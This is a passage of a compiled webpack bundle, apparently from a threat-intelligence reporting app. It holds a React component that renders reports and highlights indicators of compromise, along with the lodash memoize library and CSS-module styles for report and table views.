function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }

/* eslint-disable react/no-danger */






var cx = __WEBPACK_IMPORTED_MODULE_2_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_4__ReportContent_styl___default.a);




var highlightIOCsJSON = __WEBPACK_IMPORTED_MODULE_3_lodash_memoize___default()(function (report) {
  var json = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__["d" /* parseAndSanitizeJsonToHtml */])(report.getIn(['json', 'parsed']));
  var indicators = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__["a" /* getReportIndicators */])(report.get('indicators', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])()));
  return Object(__WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__["b" /* matchIOCsJSON */])(json, indicators);
}, function (x) {
  return x.get('reportBody');
} /* Cache key */
);

var highlightIOCs = __WEBPACK_IMPORTED_MODULE_3_lodash_memoize___default()(function (text, indicators) {
  return Object(__WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__["c" /* matchIOCsRegular */])(text, indicators, function (word, i) {
    return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      'span',
      { key: i },
      word
    );
  });
});

/**
 * This component is responsible for rendering report content. However, rather
 * than rendering a string we also do a bit of highlighting and decide how
 * exactly to render the content based on whether it's json, whether it's huge,
 * or whether it's just a standard report.
 *
 * NOTE: The 20kb or larger equals large report measurement is fairly arbitrary,
 * but it should catch most of the cases we've seen in the past.
 */
var ReportContent = function (_React$Component) {
  _inherits(ReportContent, _React$Component);

  function ReportContent() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, ReportContent);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = ReportContent.__proto__ || Object.getPrototypeOf(ReportContent)).call.apply(_ref, [this].concat(args))), _this), _this.highlight = function () {
      var str = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
      var report = _this.props.report;

      var indicators = Object(__WEBPACK_IMPORTED_MODULE_6_trustar_reports_extraction__["a" /* getReportIndicators */])(report.get('indicators', Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["List"])()));
      return highlightIOCs(str, indicators);
    }, _this.renderFallback = function () {
      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          style: {
            textAlign: 'center',
            padding: '1.67rem',
            paddingTop: '3.33rem'
          } },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'h1',
          null,
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('i', { className: 'fa fa-exclamation-circle' })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'p',
          null,
          'This report could not be displayed.'
        )
      );
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  /**
   * A simple wrapper around highlightIOCs
   */


  _createClass(ReportContent, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          report = _props.report,
          _props$expanded = _props.expanded,
          expanded = _props$expanded === undefined ? true : _props$expanded,
          _props$reportMetadata = _props.reportMetadata,
          reportMetadata = _props$reportMetadata === undefined ? Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])() : _props$reportMetadata;

      var body = expanded ? report.get('reportBody', '') : reportMetadata.get('reportBodySnippet', '');
      var content = void 0;
      var isProcessed = report.get('submissionStatus') === 'PROCESSED';

      if (!isProcessed) {
        content = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'pre',
          {
            style: {
              background: 'transparent',
              border: 'none',
              paddingLeft: '1.25rem'
            } },
          'Report is still being processed...'
        );
      } else if (typeof body !== 'string' && isProcessed) {
        // An error processing the report
        content = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'pre',
          {
            style: {
              background: 'transparent',
              border: 'none',
              paddingLeft: '1.25rem'
            } },
          'Error fetching report content.'
        );
      } else if (typeof body !== 'string') {
        // Nothing to render yet...
        content = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'pre',
          {
            style: {
              background: 'transparent',
              border: 'none',
              paddingLeft: '1.25rem'
            } },
          'Processing Report Content...'
        );
      } else if (report.getIn(['json', 'valid'])) {
        // Render JSON body
        var renderableJSON = highlightIOCsJSON(report);
        content = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement('div', {
          className: cx('reportJSON'),
          dangerouslySetInnerHTML: { __html: renderableJSON }
        });
      } else {
        // Render standard report
        var len = body.length;
        if (len > 20000) {
          console.warn('Rendering large report. UI slowness is likely to occur...');
          console.warn('Report size: ' + len / 1000 + 'kb');
        }
        content = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('reportContent') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'pre',
            null,
            this.highlight(body)
          )
        );
      }

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        __WEBPACK_IMPORTED_MODULE_5__ErrorBoundary_js__["a" /* ErrorBoundary */],
        { renderFallback: this.renderFallback },
        content
      );
    }
  }]);

  return ReportContent;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3623 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(global) {/**
 * lodash (Custom Build) <https://lodash.com/>
 * Build: `lodash modularize exports="npm" -o ./`
 * Copyright jQuery Foundation and other contributors <https://jquery.org/>
 * Released under MIT license <https://lodash.com/license>
 * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>
 * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
 */

/** Used as the `TypeError` message for "Functions" methods. */
var FUNC_ERROR_TEXT = 'Expected a function';

/** Used to stand-in for `undefined` hash values. */
var HASH_UNDEFINED = '__lodash_hash_undefined__';

/** `Object#toString` result references. */
var funcTag = '[object Function]',
    genTag = '[object GeneratorFunction]';

/**
 * Used to match `RegExp`
 * [syntax characters](http://ecma-international.org/ecma-262/7.0/#sec-patterns).
 */
var reRegExpChar = /[\\^$.*+?()[\]{}|]/g;

/** Used to detect host constructors (Safari). */
var reIsHostCtor = /^\[object .+?Constructor\]$/;

/** Detect free variable `global` from Node.js. */
var freeGlobal = typeof global == 'object' && global && global.Object === Object && global;

/** Detect free variable `self`. */
var freeSelf = typeof self == 'object' && self && self.Object === Object && self;

/** Used as a reference to the global object. */
var root = freeGlobal || freeSelf || Function('return this')();

/**
 * Gets the value at `key` of `object`.
 *
 * @private
 * @param {Object} [object] The object to query.
 * @param {string} key The key of the property to get.
 * @returns {*} Returns the property value.
 */
function getValue(object, key) {
  return object == null ? undefined : object[key];
}

/**
 * Checks if `value` is a host object in IE < 9.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a host object, else `false`.
 */
function isHostObject(value) {
  // Many host objects are `Object` objects that can coerce to strings
  // despite having improperly defined `toString` methods.
  var result = false;
  if (value != null && typeof value.toString != 'function') {
    try {
      result = !!(value + '');
    } catch (e) {}
  }
  return result;
}

/** Used for built-in method references. */
var arrayProto = Array.prototype,
    funcProto = Function.prototype,
    objectProto = Object.prototype;

/** Used to detect overreaching core-js shims. */
var coreJsData = root['__core-js_shared__'];

/** Used to detect methods masquerading as native. */
var maskSrcKey = (function() {
  var uid = /[^.]+$/.exec(coreJsData && coreJsData.keys && coreJsData.keys.IE_PROTO || '');
  return uid ? ('Symbol(src)_1.' + uid) : '';
}());

/** Used to resolve the decompiled source of functions. */
var funcToString = funcProto.toString;

/** Used to check objects for own properties. */
var hasOwnProperty = objectProto.hasOwnProperty;

/**
 * Used to resolve the
 * [`toStringTag`](http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
 * of values.
 */
var objectToString = objectProto.toString;

/** Used to detect if a method is native. */
var reIsNative = RegExp('^' +
  funcToString.call(hasOwnProperty).replace(reRegExpChar, '\\$&')
  .replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g, '$1.*?') + '$'
);

/** Built-in value references. */
var splice = arrayProto.splice;

/* Built-in method references that are verified to be native. */
var Map = getNative(root, 'Map'),
    nativeCreate = getNative(Object, 'create');

/**
 * Creates a hash object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */
function Hash(entries) {
  var index = -1,
      length = entries ? entries.length : 0;

  this.clear();
  while (++index < length) {
    var entry = entries[index];
    this.set(entry[0], entry[1]);
  }
}

/**
 * Removes all key-value entries from the hash.
 *
 * @private
 * @name clear
 * @memberOf Hash
 */
function hashClear() {
  this.__data__ = nativeCreate ? nativeCreate(null) : {};
}

/**
 * Removes `key` and its value from the hash.
 *
 * @private
 * @name delete
 * @memberOf Hash
 * @param {Object} hash The hash to modify.
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */
function hashDelete(key) {
  return this.has(key) && delete this.__data__[key];
}

/**
 * Gets the hash value for `key`.
 *
 * @private
 * @name get
 * @memberOf Hash
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */
function hashGet(key) {
  var data = this.__data__;
  if (nativeCreate) {
    var result = data[key];
    return result === HASH_UNDEFINED ? undefined : result;
  }
  return hasOwnProperty.call(data, key) ? data[key] : undefined;
}

/**
 * Checks if a hash value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf Hash
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */
function hashHas(key) {
  var data = this.__data__;
  return nativeCreate ? data[key] !== undefined : hasOwnProperty.call(data, key);
}

/**
 * Sets the hash `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf Hash
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the hash instance.
 */
function hashSet(key, value) {
  var data = this.__data__;
  data[key] = (nativeCreate && value === undefined) ? HASH_UNDEFINED : value;
  return this;
}

// Add methods to `Hash`.
Hash.prototype.clear = hashClear;
Hash.prototype['delete'] = hashDelete;
Hash.prototype.get = hashGet;
Hash.prototype.has = hashHas;
Hash.prototype.set = hashSet;

/**
 * Creates an list cache object.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */
function ListCache(entries) {
  var index = -1,
      length = entries ? entries.length : 0;

  this.clear();
  while (++index < length) {
    var entry = entries[index];
    this.set(entry[0], entry[1]);
  }
}

/**
 * Removes all key-value entries from the list cache.
 *
 * @private
 * @name clear
 * @memberOf ListCache
 */
function listCacheClear() {
  this.__data__ = [];
}

/**
 * Removes `key` and its value from the list cache.
 *
 * @private
 * @name delete
 * @memberOf ListCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */
function listCacheDelete(key) {
  var data = this.__data__,
      index = assocIndexOf(data, key);

  if (index < 0) {
    return false;
  }
  var lastIndex = data.length - 1;
  if (index == lastIndex) {
    data.pop();
  } else {
    splice.call(data, index, 1);
  }
  return true;
}

/**
 * Gets the list cache value for `key`.
 *
 * @private
 * @name get
 * @memberOf ListCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */
function listCacheGet(key) {
  var data = this.__data__,
      index = assocIndexOf(data, key);

  return index < 0 ? undefined : data[index][1];
}

/**
 * Checks if a list cache value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf ListCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */
function listCacheHas(key) {
  return assocIndexOf(this.__data__, key) > -1;
}

/**
 * Sets the list cache `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf ListCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the list cache instance.
 */
function listCacheSet(key, value) {
  var data = this.__data__,
      index = assocIndexOf(data, key);

  if (index < 0) {
    data.push([key, value]);
  } else {
    data[index][1] = value;
  }
  return this;
}

// Add methods to `ListCache`.
ListCache.prototype.clear = listCacheClear;
ListCache.prototype['delete'] = listCacheDelete;
ListCache.prototype.get = listCacheGet;
ListCache.prototype.has = listCacheHas;
ListCache.prototype.set = listCacheSet;

/**
 * Creates a map cache object to store key-value pairs.
 *
 * @private
 * @constructor
 * @param {Array} [entries] The key-value pairs to cache.
 */
function MapCache(entries) {
  var index = -1,
      length = entries ? entries.length : 0;

  this.clear();
  while (++index < length) {
    var entry = entries[index];
    this.set(entry[0], entry[1]);
  }
}

/**
 * Removes all key-value entries from the map.
 *
 * @private
 * @name clear
 * @memberOf MapCache
 */
function mapCacheClear() {
  this.__data__ = {
    'hash': new Hash,
    'map': new (Map || ListCache),
    'string': new Hash
  };
}

/**
 * Removes `key` and its value from the map.
 *
 * @private
 * @name delete
 * @memberOf MapCache
 * @param {string} key The key of the value to remove.
 * @returns {boolean} Returns `true` if the entry was removed, else `false`.
 */
function mapCacheDelete(key) {
  return getMapData(this, key)['delete'](key);
}

/**
 * Gets the map value for `key`.
 *
 * @private
 * @name get
 * @memberOf MapCache
 * @param {string} key The key of the value to get.
 * @returns {*} Returns the entry value.
 */
function mapCacheGet(key) {
  return getMapData(this, key).get(key);
}

/**
 * Checks if a map value for `key` exists.
 *
 * @private
 * @name has
 * @memberOf MapCache
 * @param {string} key The key of the entry to check.
 * @returns {boolean} Returns `true` if an entry for `key` exists, else `false`.
 */
function mapCacheHas(key) {
  return getMapData(this, key).has(key);
}

/**
 * Sets the map `key` to `value`.
 *
 * @private
 * @name set
 * @memberOf MapCache
 * @param {string} key The key of the value to set.
 * @param {*} value The value to set.
 * @returns {Object} Returns the map cache instance.
 */
function mapCacheSet(key, value) {
  getMapData(this, key).set(key, value);
  return this;
}

// Add methods to `MapCache`.
MapCache.prototype.clear = mapCacheClear;
MapCache.prototype['delete'] = mapCacheDelete;
MapCache.prototype.get = mapCacheGet;
MapCache.prototype.has = mapCacheHas;
MapCache.prototype.set = mapCacheSet;

/**
 * Gets the index at which the `key` is found in `array` of key-value pairs.
 *
 * @private
 * @param {Array} array The array to inspect.
 * @param {*} key The key to search for.
 * @returns {number} Returns the index of the matched value, else `-1`.
 */
function assocIndexOf(array, key) {
  var length = array.length;
  while (length--) {
    if (eq(array[length][0], key)) {
      return length;
    }
  }
  return -1;
}

/**
 * The base implementation of `_.isNative` without bad shim checks.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a native function,
 *  else `false`.
 */
function baseIsNative(value) {
  if (!isObject(value) || isMasked(value)) {
    return false;
  }
  var pattern = (isFunction(value) || isHostObject(value)) ? reIsNative : reIsHostCtor;
  return pattern.test(toSource(value));
}

/**
 * Gets the data for `map`.
 *
 * @private
 * @param {Object} map The map to query.
 * @param {string} key The reference key.
 * @returns {*} Returns the map data.
 */
function getMapData(map, key) {
  var data = map.__data__;
  return isKeyable(key)
    ? data[typeof key == 'string' ? 'string' : 'hash']
    : data.map;
}

/**
 * Gets the native function at `key` of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {string} key The key of the method to get.
 * @returns {*} Returns the function if it's native, else `undefined`.
 */
function getNative(object, key) {
  var value = getValue(object, key);
  return baseIsNative(value) ? value : undefined;
}

/**
 * Checks if `value` is suitable for use as unique object key.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is suitable, else `false`.
 */
function isKeyable(value) {
  var type = typeof value;
  return (type == 'string' || type == 'number' || type == 'symbol' || type == 'boolean')
    ? (value !== '__proto__')
    : (value === null);
}

/**
 * Checks if `func` has its source masked.
 *
 * @private
 * @param {Function} func The function to check.
 * @returns {boolean} Returns `true` if `func` is masked, else `false`.
 */
function isMasked(func) {
  return !!maskSrcKey && (maskSrcKey in func);
}

/**
 * Converts `func` to its source code.
 *
 * @private
 * @param {Function} func The function to process.
 * @returns {string} Returns the source code.
 */
function toSource(func) {
  if (func != null) {
    try {
      return funcToString.call(func);
    } catch (e) {}
    try {
      return (func + '');
    } catch (e) {}
  }
  return '';
}

/**
 * Creates a function that memoizes the result of `func`. If `resolver` is
 * provided, it determines the cache key for storing the result based on the
 * arguments provided to the memoized function. By default, the first argument
 * provided to the memoized function is used as the map cache key. The `func`
 * is invoked with the `this` binding of the memoized function.
 *
 * **Note:** The cache is exposed as the `cache` property on the memoized
 * function. Its creation may be customized by replacing the `_.memoize.Cache`
 * constructor with one whose instances implement the
 * [`Map`](http://ecma-international.org/ecma-262/7.0/#sec-properties-of-the-map-prototype-object)
 * method interface of `delete`, `get`, `has`, and `set`.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Function
 * @param {Function} func The function to have its output memoized.
 * @param {Function} [resolver] The function to resolve the cache key.
 * @returns {Function} Returns the new memoized function.
 * @example
 *
 * var object = { 'a': 1, 'b': 2 };
 * var other = { 'c': 3, 'd': 4 };
 *
 * var values = _.memoize(_.values);
 * values(object);
 * // => [1, 2]
 *
 * values(other);
 * // => [3, 4]
 *
 * object.a = 2;
 * values(object);
 * // => [1, 2]
 *
 * // Modify the result cache.
 * values.cache.set(object, ['a', 'b']);
 * values(object);
 * // => ['a', 'b']
 *
 * // Replace `_.memoize.Cache`.
 * _.memoize.Cache = WeakMap;
 */
function memoize(func, resolver) {
  if (typeof func != 'function' || (resolver && typeof resolver != 'function')) {
    throw new TypeError(FUNC_ERROR_TEXT);
  }
  var memoized = function() {
    var args = arguments,
        key = resolver ? resolver.apply(this, args) : args[0],
        cache = memoized.cache;

    if (cache.has(key)) {
      return cache.get(key);
    }
    var result = func.apply(this, args);
    memoized.cache = cache.set(key, result);
    return result;
  };
  memoized.cache = new (memoize.Cache || MapCache);
  return memoized;
}

// Assign cache to `_.memoize`.
memoize.Cache = MapCache;

/**
 * Performs a
 * [`SameValueZero`](http://ecma-international.org/ecma-262/7.0/#sec-samevaluezero)
 * comparison between two values to determine if they are equivalent.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 * @example
 *
 * var object = { 'a': 1 };
 * var other = { 'a': 1 };
 *
 * _.eq(object, object);
 * // => true
 *
 * _.eq(object, other);
 * // => false
 *
 * _.eq('a', 'a');
 * // => true
 *
 * _.eq('a', Object('a'));
 * // => false
 *
 * _.eq(NaN, NaN);
 * // => true
 */
function eq(value, other) {
  return value === other || (value !== value && other !== other);
}

/**
 * Checks if `value` is classified as a `Function` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a function, else `false`.
 * @example
 *
 * _.isFunction(_);
 * // => true
 *
 * _.isFunction(/abc/);
 * // => false
 */
function isFunction(value) {
  // The use of `Object#toString` avoids issues with the `typeof` operator
  // in Safari 8-9 which returns 'object' for typed array and other constructors.
  var tag = isObject(value) ? objectToString.call(value) : '';
  return tag == funcTag || tag == genTag;
}

/**
 * Checks if `value` is the
 * [language type](http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
 * of `Object`. (e.g. arrays, functions, objects, regexes, `new Number(0)`, and `new String('')`)
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an object, else `false`.
 * @example
 *
 * _.isObject({});
 * // => true
 *
 * _.isObject([1, 2, 3]);
 * // => true
 *
 * _.isObject(_.noop);
 * // => true
 *
 * _.isObject(null);
 * // => false
 */
function isObject(value) {
  var type = typeof value;
  return !!value && (type == 'object' || type == 'function');
}

module.exports = memoize;

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17)))

/***/ }),
/* 3624 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3625);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./ReportContent.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./ReportContent.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3625 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".ReportContent__reportContent__1FSZZv,\n.ReportContent__reportJSON__1-J5xk {\n  background: light-bg-gray;\n}\n.ReportContent__reportContent__1FSZZv {\n  border: none;\n  flex: 1;\n  overflow: auto;\n}\n.ReportContent__reportContent__1FSZZv pre {\n  border: none;\n  font-family: 'SplunkDataSans', 'Helvetica Neue', Helvetica, Arial, sans-serif;\n  font-size: 13px;\n  overflow: auto;\n  margin: 0;\n  padding: 10px;\n  white-space: pre-wrap;\n}\n.ReportContent__reportContent__1FSZZv pre span {\n  color: #528bff;\n  font-weight: 500;\n}\n.ReportContent__reportJSON__1-J5xk {\n  padding: 5px;\n  overflow-x: scroll;\n}\n.ReportContent__reportJSON__1-J5xk div {\n  padding: 0;\n  font-weight: normal;\n  font-size: 12px;\n}\n.ReportContent__reportJSON__1-J5xk a {\n  color: #40e0d0;\n  text-decoration: none;\n}\n.ReportContent__reportJSON__1-J5xk a:hover {\n  color: #eebd31;\n  text-decoration: underline;\n}\n.dark .ReportContent__reportContent__1FSZZv,\n.dark .ReportContent__reportJSON__1-J5xk {\n  background: #1a1c20;\n}\n", ""]);

// exports
exports.locals = {
	"reportContent": "ReportContent__reportContent__1FSZZv",
	"reportJSON": "ReportContent__reportJSON__1-J5xk"
};

/***/ }),
/* 3626 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3627);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Table.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./Table.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3627 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".Table__SettingsTable__2iUboL {\n  overflow: auto;\n}\n.Table__ColumnTitle__Oec9Kk {\n  font-weight: bold;\n  color: #fff;\n  font-size: 12px;\n}\n.Table__TableControls__bauaLB {\n  padding: 0;\n  display: flex;\n  flex-direction: row;\n  align-items: center;\n  position: relative;\n}\n.Table__TableControls__bauaLB .Table__search__1B8UoR {\n  background: #1a1c20;\n  border-color: #464646;\n  color: #fff;\n  margin-right: 10px;\n  width: 200px;\n}\n.Table__TableControls__bauaLB .Table__search__1B8UoR:focus {\n  border-color: #595959;\n}\n.Table__TableControls__bauaLB .Table__searchIcon__fg-OLZ {\n  position: relative;\n}\n.Table__TableControls__bauaLB .Table__searchIcon__fg-OLZ i {\n  position: absolute;\n  top: 50%;\n  -webkit-transform: translateY(-50%);\n          transform: translateY(-50%);\n  right: 15px;\n  color: #fff;\n  font-size: 13px;\n}\n.Table__SettingsTable__2iUboL .Table__HeaderRow__fDCYXR,\n.Table__SettingsTable__2iUboL .Table__TableRow__DlDLWU {\n  margin: 5px 0px;\n  display: flex;\n  flex-direction: row;\n  justify-content: center;\n}\n.Table__SettingsTable__2iUboL .Table__HeaderRow__fDCYXR p,\n.Table__SettingsTable__2iUboL .Table__TableRow__DlDLWU p {\n  font-size: 12px;\n}\n.Table__SettingsTable__2iUboL .Table__HeaderRow__fDCYXR {\n  margin-top: 20px;\n}\n.Table__SettingsTable__2iUboL .Table__HeaderRow__fDCYXR .Table__HeaderCell__3hIbAT {\n  text-transform: uppercase;\n  letter-spacing: 1px;\n  font-size: 13px;\n  font-weight: 600;\n}\n.Table__SettingsTable__2iUboL .Table__HeaderRow__fDCYXR .Table__HeaderCell__3hIbAT:last-child {\n  display: flex;\n  justify-content: flex-start;\n}\n.Table__SettingsTable__2iUboL .Table__TableContainer__1FM28m {\n  overflow-y: scroll;\n  padding-top: 10px;\n}\n.Table__SettingsTable__2iUboL .Table__TableContainer__1FM28m .Table__TableContent__2LVz-C {\n  display: flex;\n  flex-direction: column;\n  padding-bottom: 0px;\n}\n.Table__SettingsTable__2iUboL .Table__TableRow__DlDLWU .Table__Cell__1_qqW9 {\n  font-size: 12px;\n  display: flex;\n  padding: 2px 10px;\n  align-items: center;\n}\n.Table__SettingsTable__2iUboL .Table__TableRow__DlDLWU .Table__Cell__1_qqW9:last-child {\n  display: flex;\n  justify-content: flex-start;\n  flex-direction: column;\n  align-items: flex-end;\n  padding-right: 5px;\n}\n.Table__SettingsTable__2iUboL .Table__TableRow__DlDLWU:hover {\n  border-left-color: #eebd31;\n}\n.Table__CustomTableInfo__3bglWR {\n  position: absolute;\n  right: 125px;\n  display: flex;\n  flex-direction: row;\n}\n.Table__CustomTableInfo__3bglWR p {\n  color: #fff;\n  font-weight: bold;\n}\n.Table__SortControls__1WY6Kh {\n  display: flex;\n  flex-direction: row;\n  align-items: center;\n  margin-right: 0;\n  margin-left: auto;\n}\n.Table__SortControls__1WY6Kh .Table__Select__1ha7Gi {\n  margin-left: 5px;\n}\n.Table__CustomTableInfo__3bglWR p {\n  color: #4a4a4a;\n}\n.Table__TableControls__bauaLB .Table__search__1B8UoR {\n  color: #4a4a4a;\n  background: #fff;\n  border: 1px solid #ddd;\n}\n.Table__TableControls__bauaLB .Table__searchIcon__fg-OLZ i {\n  color: #4a4a4a;\n}\n.Table__SortControls__1WY6Kh span {\n  color: #4a4a4a;\n}\n.Table__ColumnTitle__Oec9Kk,\n.Table__title__26RIgQ {\n  color: #4a4a4a;\n}\n.Table__HeaderRow__fDCYXR .Table__HeaderCell__3hIbAT {\n  color: #4a4a4a;\n  border-bottom-color: #ddd;\n}\n.Table__TableRow__DlDLWU {\n  background: #f2f2f2;\n  padding-left: 5px;\n}\n.Table__TableRow__DlDLWU b,\n.Table__TableRow__DlDLWU strong {\n  color: #000;\n}\n.Table__TableRow__DlDLWU p {\n  color: #4a4a4a;\n}\n.Table__TableRow__DlDLWU:hover {\n  background: #e6e6e6;\n}\n.Table__TableRow__DlDLWU .Table__Cell__1_qqW9 {\n  color: #4a4a4a;\n}\n.Table__Select__1ha7Gi {\n  min-width: 200px;\n}\n.Table__Select__1ha7Gi .Select-control .Select-input {\n  height: 32px;\n}\n.Table__Select__1ha7Gi .Select-placeholder {\n  font-weight: 100;\n}\n.Table__RolesSelect__3TM9tF {\n  margin-left: 5px;\n  width: 165px;\n}\n.Table__green__2OlhK5,\n.Table__yellow__Rexgmo,\n.Table__blue__3nz2l6,\n.Table__red__Ovpmzu,\n.Table__gray__3m_FmN {\n  font-size: 15px;\n  margin-right: 5px;\n}\n.Table__green__2OlhK5 {\n  color: #60b044;\n}\n.Table__yellow__Rexgmo {\n  color: #eebd31;\n}\n.Table__blue__3nz2l6 {\n  color: #528bff;\n}\n.Table__gray__3m_FmN {\n  color: #aaa;\n}\n.Table__red__Ovpmzu {\n  color: #d13f19;\n}\n.dark .Table__SettingsTable__2iUboL p,\n.dark .Table__CustomTableInfo__3bglWR p {\n  color: #f7f7f7;\n  font-weight: bold;\n}\n.dark .Table__CustomTableInfo__3bglWR p {\n  color: #f7f7f7;\n}\n.dark .Table__SortControls__1WY6Kh span {\n  color: #f7f7f7;\n}\n.dark .Table__ColumnTitle__Oec9Kk,\n.dark .Table__title__26RIgQ {\n  color: #f7f7f7;\n}\n.dark .Table__HeaderRow__fDCYXR .Table__HeaderCell__3hIbAT {\n  color: #f7f7f7;\n  border-bottom-color: #ddd;\n}\n.dark .Table__TableRow__DlDLWU {\n  background: #464646;\n}\n.dark .Table__TableRow__DlDLWU b,\n.dark .Table__TableRow__DlDLWU strong {\n  color: #f7f7f7;\n}\n.dark .Table__TableRow__DlDLWU p {\n  color: #f7f7f7;\n}\n.dark .Table__TableRow__DlDLWU:hover {\n  background: #595959;\n}\n.dark .Table__TableRow__DlDLWU .Table__Cell__1_qqW9 {\n  color: #f7f7f7;\n}\n", ""]);

// exports
exports.locals = {
	"SettingsTable": "Table__SettingsTable__2iUboL",
	"ColumnTitle": "Table__ColumnTitle__Oec9Kk",
	"TableControls": "Table__TableControls__bauaLB",
